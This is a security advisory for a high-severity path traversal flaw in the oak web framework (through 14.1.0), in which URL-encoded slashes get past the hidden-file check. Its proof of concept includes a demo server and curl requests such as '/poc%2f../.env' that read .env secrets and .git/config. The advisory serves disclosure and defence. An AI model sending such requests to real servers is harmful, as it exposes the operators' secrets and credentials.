GHSA-qm92-93fv-vh7m

Suggest an improvement
Source
https://github.com/advisories/GHSA-qm92-93fv-vh7m
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-qm92-93fv-vh7m/GHSA-qm92-93fv-vh7m.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-qm92-93fv-vh7m
Aliases
Published
2024-11-01T21:37:10Z
Modified
2024-11-01T22:27:22.350305Z
Severity
  • 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVSS Calculator
  • 7.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P CVSS Calculator
Summary
Path traversal in oak allows transfer of hidden files within the served root directory
Details

Summary

By default oak does not allow transferring of hidden files with Context.send API. However, this can be bypassed by encoding / as its URL encoded form %2F.

Details

1.) Oak uses decodeComponent which seems to be unexpected. This is also the reason why it is not possible to access a file that contains URL encoded characters unless the client URL encodes it first.

2.) The function isHidden is flawed since it only checks if the first subpath is hidden, allowing secrets to be read from subdir/.env.

PoC

// server.ts

import { Application } from "jsr:@oak/oak@17.1.2";

const app = new Application();

app.use(async (context, next) => {
  try {
    await context.send({
      root: './root',
      hidden: false, // default
    });
  } catch {
    await next();
  }
});

await app.listen({ port: 8000 });

In terminal:

# setup root directory
mkdir root/.git
echo SECRET_KEY=oops > root/.env
echo oops >  root/.git/config

# start server
deno run -A server.ts

# in another terminal
curl -D- http://127.0.0.1:8000/poc%2f../.env
curl -D- http://127.0.0.1:8000/poc%2f../.git/config

Impact

For an attacker this has potential to read sensitive user data or to gain access to server secrets.

Database specific
{
    "nvd_published_at": "2024-11-01T17:15:17Z",
    "cwe_ids": [
        "CWE-22",
        "CWE-35"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-01T21:37:10Z"
}
References

Affected packages

npm / @oakserver/oak

Package

Name
@oakserver/oak
View open source insights on deps.dev
Purl
pkg:npm/%40oakserver/oak

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
14.1.0